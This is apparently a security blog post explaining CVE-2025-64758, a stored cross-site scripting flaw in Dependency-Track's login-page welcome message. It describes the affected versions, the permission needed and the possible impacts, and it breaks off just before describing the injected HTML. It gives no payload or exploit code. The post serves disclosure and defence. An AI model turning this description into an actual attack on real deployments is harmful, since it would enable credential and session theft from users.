Dependency-Track Login Page Under Attack: Understanding CVE-2025-64758

Account Compromise: Attackers could potentially steal user credentials or session cookies from users visiting the login page.
Data Theft: Malicious JavaScript could be used to exfiltrate sensitive data from the user's browser.
Phishing Attacks: The login page could be modified to resemble a legitimate login form, tricking users into entering their credentials.
Defacement: The login page could be defaced to display malicious or misleading content.

November 17, 2025 - By Gowri Shankar

Overview

CVE-2025-64758 is a medium-severity Cross-Site Scripting (XSS) vulnerability affecting Dependency-Track, an open-source Component Analysis platform. Specifically, versions of @dependencytrack/frontend prior to 4.13.6 are vulnerable. This vulnerability allows users with the `SYSTEM_CONFIGURATION` permission (typically administrators) to inject arbitrary JavaScript code into the login page through the welcome message feature.

Technical Details

Dependency-Track’s frontend allows administrators to configure a custom “welcome message” on the login page. This message is intended for branding purposes and accepts HTML input. However, versions before 4.13.6 failed to properly sanitize this HTML input. An attacker with `SYSTEM_CONFIGURATION` permission can inject malicious JavaScript code within HTML tags. When other users access the login page, this injected JavaScript code executes within their browsers, potentially leading to session hijacking, account compromise, or other malicious activities.

The vulnerable code resides within the rendering process of the welcome message. By injecting specially crafted HTML that includes `